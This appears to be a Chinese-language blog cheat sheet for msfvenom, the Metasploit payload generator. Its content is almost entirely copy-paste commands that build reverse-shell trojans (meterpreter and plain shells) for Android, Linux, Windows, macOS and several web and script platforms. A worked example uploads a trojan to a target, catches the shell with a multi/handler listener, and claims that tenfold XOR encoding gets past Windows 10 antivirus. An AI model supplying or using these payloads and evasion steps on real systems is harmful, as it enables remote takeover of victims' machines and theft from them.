msfvenom
命令常见shell实例参考命令
-l:列出所有模块。类型有:payloads, encoders, nops, platforms, archs, encrypt, formats, al.(使用 -l payloads列出payload,- -list-options 列出载荷参数)-p:指定要使用的有效负载。-f:输出文件的格式 ,(-l formats列出所有文件格式)
-e:指定要使用的编码器,(-list encodes列出所有编码器) –smallest: 使用所有可用的编码器生成尽可能小的有效负载
-a:指定架构平台(–l archs 列出所有架构)
–platform:指定操作系统平台(-l platforms 列出所有平台)
-o:保存至指定文件。-b:要避免的字符,示例:’\x00\xff’n: 在payload上添加指定长度的nop指令-s:产生的payload的最大大小. –encoder-space:编码payload的最大大小. -i: 对payload进行编码的次数-c:指定一个win32的shellcode文件-x:指定要用作模板的自定义可执行文件。-k:保留-x行为并将有效负载作为新线程注入-v:指定用于某些输出格式的自定义变量名-t:从STDIN读取有效负载时等待的秒数(默认值为30,0表示禁用)msfvenom -l | grep windows | grep x64 | grep tcp:列出windows平台,下x64架构tcp payload
常见shell
安卓app:msfvenom -p android/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -o ~/Desktop/test2.apk Linux msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f elf > shell.elf Windows msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe > shell.exeMac msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f macho > shell.macho PHP msfvenom -p php/meterpreter_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.php ASP msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f asp > shell.asp JSP msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.jsp WAR msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f war > shell.war Python msfvenom -p cmd/unix/reverse_python LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.py Bashmsfvenom -p cmd/unix/reverse_bash LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.sh Perl msfvenom -p cmd/unix/reverse_perl LHOST=<Your IP Addre0ss> LPORT=<Your Port to Connect On> -f raw > shell.pl
实例
linux:使用linux/x86/meterpreter/reverse_tcp,查看参数当前目录下生成shell.elf,将文件上传至靶机
使用msf,exploit/multi/handler模块监听
set payload linux/x86/meterpreter/reverse_tcpset lhost 192.168.186.128set lport 4444
当目标运行木马文件,就拿到一个meterpreter shell。
windows:windows64位,经过10次异或编码。在windows10下无报毒。
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.186.128 LPORT=8888 --platform windows -e x64/xor -i 10 -a x64 -f exe >shell.exe
同样在msf下使用exploit/multi/handle模块。
执行后,成功拿到meterpreter shell
参考
/BOHB-yunying/p/11628896.html
/qq_36119192/article/details/83869141
如果觉得《msfvenom木马生成工具》对你有帮助,请点赞、收藏,并留下你的观点哦!